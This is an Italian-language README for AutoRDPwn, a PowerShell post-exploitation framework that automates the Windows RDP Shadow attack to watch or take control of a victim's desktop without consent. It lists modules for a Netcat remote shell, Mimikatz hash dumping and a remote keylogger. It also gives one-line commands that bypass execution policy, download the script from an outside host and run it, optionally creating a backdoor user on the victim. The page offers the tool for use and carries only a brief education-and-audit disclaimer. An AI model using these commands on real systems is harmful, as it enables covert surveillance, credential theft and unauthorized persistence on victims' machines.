
Il Framework Shadow Attack

AutoRDPwn è un framework di post-exploitation creato in Powershell, progettato principalmente per automatizzare l'attacco Shadow sui computer Microsoft Windows. Questa vulnerabilità (elencata come funzionalità da Microsoft) consente a un utente malintenzionato remoto di visualizzare il desktop della vittima senza il suo consenso e persino di controllarlo su richiesta, utilizzando strumenti nativi del sistema operativo stesso.
Grazie ai moduli aggiuntivi, è possibile ottenere una shell remota tramite Netcat, dumpare gli hash di sistema con Mimikatz, caricare un keylogger remoto e molto altro. Il tutto attraverso un menu completamente intuitivo in sette lingue diverse.
Inoltre, è possibile utilizzarlo in una reverse shell tramite una serie di parametri descritti nella sezione Utilizzo.
Powershell 4.0 o superiore
• Molti bug corretti
• Miglioramenti estetici e tempi di attesa ottimizzati
• Connessione Proxy-Aware tramite le impostazioni di sistema
• Ora è possibile utilizzare lo strumento offline scaricando il file .zip
• Rilevamento automatico della lingua premendo il tasto Invio
• Invoke-DCOM è stato sostituito da SharpRDP
• PowerUp è stato sostituito da Invoke-PrivescCheck
• Creazione della subroutine di pulizia automatica sulla vittima
• Nuovo modulo disponibile: SMB Shell crittografata con AES
• Nuovo modulo disponibile: Cambio utente con RunAs
*Le restanti modifiche possono essere consultate nel file CHANGELOG
Questa applicazione può essere utilizzata localmente, in remoto o per fare pivot tra macchine.
Quando utilizzata in remoto in una reverse shell, è necessario usare i seguenti parametri:
Esecuzione locale su una riga:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Esempio di esecuzione remota su una riga:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

Questo progetto è concesso in licenza GNU 3.0 - consulta il file LICENSE per maggiori dettagli.
Questo framework è stato creato e progettato da zero da Joel Gámez Molina // @JoelGMSec
Alcuni moduli utilizzano codice, script e strumenti di terze parti, in particolare:
• Chachi-Enumerator di Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m di Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp di Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash di Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz di Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec di Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper di Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP di Steven F --> https://github.com/0xthirteen/SharpRDP
E molti altri, che non trovano spazio qui.. Grazie a tutti loro e al loro eccellente lavoro.
Questo software non offre alcun tipo di garanzia. Il suo utilizzo è esclusivo per ambienti educativi e/o audit di sicurezza con il corrispondente consenso del cliente. Non sono responsabile per il suo uso improprio o per eventuali danni causati da esso.
Per maggiori informazioni, puoi trovarmi su Twitter come @JoelGMSec e sul mio blog darkbyte.net.
Puoi supportare il mio lavoro offrendomi un caffè:
| Parametro | Descrizione |
|---|
| -admin / -noadmin | A seconda dei permessi che abbiamo, ne useremo uno o l'altro |
| -nogui | Questo eviterà di caricare il menu e alcuni colori, garantendo la funzionalità |
| -lang | Sceglieremo la nostra lingua (Inglese, Spagnolo, Francese, Tedesco, Italiano, Russo o Portoghese) |
| -option | Come con il menu, possiamo scegliere come lanciare l'attacco |
| -shadow | Decideremo se vogliamo vedere o controllare il dispositivo remoto |
| -createuser | Questo parametro è opzionale, l'utente AutoRDPwn:AutoRDPwn verrà creato sulla macchina vittima |
| -noclean | Disabilita il processo di annullamento di tutte le modifiche sul computer vittima |